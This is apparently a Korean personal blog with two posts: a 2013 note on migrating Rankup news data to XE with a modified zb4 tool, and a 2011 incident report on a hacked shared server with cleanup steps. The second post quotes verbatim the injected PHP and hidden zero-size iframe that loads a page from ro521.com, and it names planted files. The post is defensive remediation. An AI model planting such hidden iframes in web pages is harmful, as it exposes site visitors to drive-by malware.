지나간다2013/06/05

다시 홈페이지 만들일이 하나 생겨서..

틈틈이 그 작업을 하고 있다.

 

당장 봉착한 큰 일은 데이터 이전.

처음엔 참 막막했는데, 몇번 하다보니 대충 감도 생기고..

못옮기는 데이터란 없다는 자신감도 생긴다 ㅋㅋ

 

하지만 역시 근거없는 자신감일 뿐,

여러번의 시행착오 끝에 얼추 옮겼는데.. 옮기지 못한 항목들이 있다.

 

Rankup 뉴스솔루션 데이터를 XE로 옮기는 작업이었는데,

zb4->xe 마이그레이션 툴을 수정해서 사용했다.

 

XML 제작 문제와 별개로,

XE 최신버전(1.7)에서는 댓글이 아예 옮겨지지 않는다.

그래서 XE를 1.5로 설치하고 데이터를 이전시켜야 한다. (XE 버전에 따라 마이그레이션이 안되는 건 문제 있는 거 아닌가? XE끼리도 마이그레이션을 해야할 경우가 있을텐데, 이럴 때 완전히 옮겨진다고 장담할 수 없는거잖아.)

 

확장변수는 마이그레이션 툴 소스를 수정해야만 옮겨진다.

(이것도 xe 어느 버전에서부터 이전이 안되는거라고 한다. 임시방편으로 '<key>값</key>' 이렇게 xml을 작성하는데, '<key></key>' 사이에 '<value>값</value>' 를 넣어주면 된다.)

수정해도 완전히 의도한대로 옮겨지지는 않았다.

왜 그런지 이해는 안되지만, 아무튼 옮겨졌으니까 패스.

 

혹시 참고할 사람들이 있을까 해서 사용한 소스를 올려놓는다. 나같은 삽질을 좀 덜하면 좋겠단 마음에 ㅠㅜ

 

두고두고 사용할 게 아닌지라 필요한 부분만 대충 수정해서 모양새가 좀 그런데, 사용에는 문제없다.

사용하려면 zb4 형식으로 config.php 파일을 작성해야 하고, db에는 zetyx_admin_table 을 만들어서 게시판 항목을 하나라도 만들어 놓아야 한다.

 

config.php 예제

<?

localhost

db id

db pass

db name

?>

 

zetyx_admin_table 테이블에는 no, name 필드를 만들고 아무 레코드나 입력해놓으면 되리라 생각한다. 해보진 않아서 확신은 없지만..

 

[rankmig.zip (36.72 KB) 다운받기]

2013/06/05 15:36 2013/06/05 15:36

지나간다ro521.com

지역 단체들이 이용하는 서버가 있는데 몇몇 계정에

 

<?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe><?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe>

 

이런 스크립트가 몽땅 들어와있다.

지난 크리스마스에. 크리스마스에. 크리스마스에. 크리스마스에.

.... 난 아무것도 모른 채 그냥 놀고 있었으니 별로 할 말은 없지만

똥줄 태운 서버관리자들 많았을거라 생각해보면, 고것 참...;

 

난 어디에 취약점이 있어서 저런 일이 가능했는지도 모르겠고,

이 서버는 웹접속기록에 ip를 아예 남기지 않도록 해놨기 때문에 어느곳에서 들어왔는지도 파악할 수 없다.

-_-;;; 이런 일 겪고 나니까 ip를 남겨놓도록 해야하나 싶기도 한데....

 

아무튼 너무 많은 파일들에 스크립트가 삽입돼서 어떻게 손을 못쓰고 있었다.

(vi로 할줄 아는 것이라곤 쓰고 저장하고 닫는 게 전부....)

퍼미션을 잘못 관리해 자료실에 올려둔 모든 파일에 스크립트가 삽입된 계정도 있다.

 

지금 해본 건 서버의 파일을 몽땅 다운 받은 다음에 ultraedit로 파일 찾아 바꾸기를 하는 것.

결과는 썩 괜찮은 듯??

 

 

 

조처 사항.

 

제로보드의 경우

- data/icon 폴더에서 group_qazwsxedc.jpg, visitLog.php  삭제.

- db에서 <?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe><?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe> 다 삭제.(제로보드는 그룹설정에 코드가 삽입되어 있다.)

- 서버에 있는 파일들 모두 다운 받은 뒤 ultraedit로 위 스크립트 찾아 바꾼 뒤 다시 업로드 한다.(울트라에디트에는 폴더 안에 있는 파일을 한꺼번에 찾아바꾸는 기능이 있다.)

- http://www.xpressengine.com/zb4_security/ 이곳에서 보안관련 패치를 받아 업데이트 한다.

2011/01/10 20:05 2011/01/10 20:05